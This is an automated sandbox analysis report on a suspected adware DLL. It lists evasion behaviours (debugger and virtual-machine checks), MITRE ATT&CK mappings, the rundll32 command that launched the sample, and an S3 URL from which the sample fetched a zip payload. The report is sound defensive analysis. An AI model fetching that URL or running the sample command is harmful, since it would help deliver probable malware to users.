Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\rundll32.exe

File opened / queried: C:\Users\user\Desktop\VMware Workstation.lnk

Source: C:\Windows\System32\loaddll64.exe TID: 7460

Thread sleep time: -120000s >= -30000s

Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00415080 FindFirstFileW,FindClose,	3_2_00415080
Source: C:\Windows\System32\rundll32.exe	Code function: 4_1_00415080 FindFirstFileW,	4_1_00415080
Source: C:\Windows\System32\rundll32.exe	Code function: 10_2_00415080 FindFirstFileW,FindClose,	10_2_00415080
Source: C:\Windows\System32\rundll32.exe	Code function: 14_2_00415080 FindFirstFileW,FindClose,	14_2_00415080
Source: C:\Windows\System32\rundll32.exe	Code function: 15_2_00415080 FindFirstFileW,FindClose,	15_2_00415080
Source: C:\Windows\System32\rundll32.exe	Code function: 15_1_00415080 FindFirstFileW,	15_1_00415080
Source: C:\Windows\System32\rundll32.exe	Code function: 17_1_00415080 FindFirstFileW,	17_1_00415080

Source: C:\Windows\System32\rundll32.exe

Code function: 4_1_00417CD0 GetSystemInfo,

4_1_00417CD0

Source: C:\Windows\System32\loaddll64.exe

Thread delayed: delay time: 120000

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_dec_27d8c3fe9e4ce467db0e38d9cdded62657c28_b4dfb63c_1035b44d-43cf-4336-9f4b-7f94949dfc2c\	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_dec_e26d2cbdf0ab1647723bb3a38bd2737c2e0af57_b4dfb63c_e5ced0b6-a51a-4527-9ac5-1082608266c4\	Jump to behavior

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: decrypt-main.dll.dll	Binary or memory string: \VMware Workstation.lnk
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: rundll32.exe, 0000000F.00000002.2904017483.000001FE9D84E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Users\user\Desktop\VMware Workstation.lnk?
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: rundll32.exe, 00000003.00000002.1836201248.000001B71A00E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1836201248.000001B719FA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1836201248.000001B719F95000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: rundll32.exe, 0000000F.00000002.2904569459.000001FE9F206000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: -C:\Users\user\Desktop\VMware Workstation.lnk
Source: rundll32.exe, 0000000F.00000002.2904017483.000001FE9D84E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Users\user\Desktop\VMware Workstation.lnk
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: rundll32.exe, 0000000E.00000002.2904346932.0000022C05786000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: -C:\Users\user\Desktop\VMware Workstation.lnk,
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\rundll32.exe

API call chain: ExitProcess graph end node

graph_3-6852

Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\rundll32.exe

Network Connect: 16.12.1.62 443

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",#1

Source: C:\Windows\System32\rundll32.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	3_2_00415230
Source: C:\Windows\System32\rundll32.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_004142E0
Source: C:\Windows\System32\rundll32.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	10_2_00415230
Source: C:\Windows\System32\rundll32.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	10_2_004142E0
Source: C:\Windows\System32\rundll32.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	14_2_00415230
Source: C:\Windows\System32\rundll32.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	14_2_004142E0
Source: C:\Windows\System32\rundll32.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	15_2_00415230
Source: C:\Windows\System32\rundll32.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	15_2_004142E0

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	2 Masquerading	OS Credential Dumping	31 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	111 Process Injection	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	22 System Information Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Rundll32	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
decrypt-main.dll.dll	62%	ReversingLabs	Win64.Adware.RedCap

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s3-r-w.sa-east-1.amazonaws.com	16.12.1.62	true	false		high
bucreate203920233.s3.sa-east-1.amazonaws.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketPc.zip	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketPc.zipqJ	rundll32.exe, 00000003.00000002.1836201248.000001B719FA4000.00000004.00000020.00020000.00000000.sdmp	false	high
https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketPc.zipJ	rundll32.exe, 00000003.00000002.1836201248.000001B719F70000.00000004.00000020.00020000.00000000.sdmp	false	high
http://upx.sf.net	Amcache.hve.7.dr	false	high
https://bucreate203920233.s3.sa-east-1.amazonaws.com/:	rundll32.exe, 00000003.00000002.1836201248.000001B719FD6000.00000004.00000020.00020000.00000000.sdmp	false	high
http://www.delphiforfun.org/	rundll32.exe, rundll32.exe, 00000011.00000002.1839230847.0000000000428000.00000020.00000001.01000000.00000003.sdmp, decrypt-main.dll.dll	false	high
https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketPc.zip~K	rundll32.exe, 00000003.00000002.1836201248.000001B719FA4000.00000004.00000020.00020000.00000000.sdmp	false	high
https://bucreate203920233.s3.sa-east-1.amazonaws.com/R	rundll32.exe, 00000003.00000002.1836201248.000001B719FD6000.00000004.00000020.00020000.00000000.sdmp	false	high
https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketPc.zipx7E	rundll32.exe, 00000003.00000002.1836201248.000001B719FD6000.00000004.00000020.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
16.12.1.62	s3-r-w.sa-east-1.amazonaws.com	United States		unknown	unknown	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1408464
Start date and time:	2024-03-13 16:50:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
